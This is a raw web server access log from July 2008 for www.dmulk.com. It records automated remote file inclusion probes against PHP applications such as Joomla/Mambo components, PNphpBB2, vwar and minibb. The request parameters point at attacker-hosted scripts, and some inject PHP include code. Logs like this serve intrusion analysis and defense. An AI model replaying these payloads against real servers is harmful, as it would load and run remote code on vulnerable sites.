207.213.245.215 - - [19/Jul/2008:11:30:36 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:30:36 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:30:37 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18523 "-" "libwww-perl/5.65" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:30:42 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:30:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:30:47 -0700] "GET /logs/access_080110.log//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:30:47 -0700] "GET //components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:30:48 -0700] "GET /logs//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:30:50 -0700] "GET /logs/access_080105.log//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.134.225.114 - - [19/Jul/2008:11:31:04 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:31:07 -0700] "GET /logs/access_080110.log//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:31:08 -0700] "GET //components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:31:12 -0700] "GET /logs//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:31:12 -0700] "GET /logs/access_080105.log//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:31:14 -0700] "GET /logs/access_080313.log%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:31:32 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:31:34 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18481 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:31:35 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [19/Jul/2008:11:31:37 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.106 - - [19/Jul/2008:11:31:38 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 18477 "-" "Mozilla/5.0" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:40 -0700] "GET /logs/access_080225.log/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:40 -0700] "GET /logs/access_080225.log/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:40 -0700] "GET /logs/access_080225.log/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:40 -0700] "GET /logs/access_080225.log/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:42 -0700] "GET /index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:42 -0700] "GET /index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:42 -0700] "GET /logs/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:42 -0700] "GET /logs/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:43 -0700] "GET /index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:43 -0700] "GET /index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:44 -0700] "GET /logs/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:31:44 -0700] "GET /logs/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:31:57 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.27 - - [19/Jul/2008:11:32:18 -0700] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:32:31 -0700] "GET /logs/access.log%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:32:41 -0700] "GET /logs/access_080103.log%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:32:43 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:32:47 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:32:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:32:50 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:32:53 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 200 18477 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:32:54 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:32:59 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:33:00 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:33:03 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:33:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:33:06 -0700] "GET /logs/index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:33:07 -0700] "GET /index.php?pagina1=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:33:11 -0700] "GET /logs/access_080313.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:33:13 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:33:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:33:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:33:47 -0700] "GET /logs/access_080313.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:33:48 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:33:48 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:33:48 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
208.115.111.243 - - [19/Jul/2008:11:33:50 -0700] "GET / HTTP/1.1" 200 18257 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:33:51 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 200 18471 "-" "libwww-perl/5.50" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:33:58 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.193.201.65 - - [19/Jul/2008:11:33:59 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:33:59 -0700] "GET /logs/access_080528.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:34:08 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:34:08 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:34:08 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:34:31 -0700] "GET /logs/access_080329.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:34:34 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 200 18555 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [19/Jul/2008:11:34:36 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:34:36 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [19/Jul/2008:11:34:37 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 18483 "-" "Mozilla/5.0" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:34:46 -0700] "GET /logs/access_080329.log//?path%5Bdocroot%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:34:48 -0700] "GET //?path%5Bdocroot%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 18395 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:34:48 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 56856 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:34:53 -0700] "GET /logs/access.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:34:53 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:34:54 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:35:09 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:35:22 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:35:24 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 200 18493 "-" "libwww-perl/5.811" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:35:28 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:35:32 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:35:32 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
72.18.152.53 - - [19/Jul/2008:11:35:38 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.18.152.53 - - [19/Jul/2008:11:35:38 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:35:39 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.53 - - [19/Jul/2008:11:35:39 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 18519 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:35:39 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:35:40 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:35:43 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:35:43 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:36:00 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:36:02 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:36:06 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:36:08 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18487 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:36:10 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:36:12 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.18.152.53 - - [19/Jul/2008:11:36:13 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:36:13 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:36:14 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:36:15 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 200 18497 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:36:18 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:36:22 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.34.78.106 - - [19/Jul/2008:11:36:23 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:36:23 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18487 "-" "libwww-perl/5.65" "www.dmulk.com"
195.34.78.106 - - [19/Jul/2008:11:36:25 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 18475 "-" "Mozilla/5.0" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:36:52 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:37:14 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:37:24 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:37:24 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:37:36 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:37:42 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:37:42 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
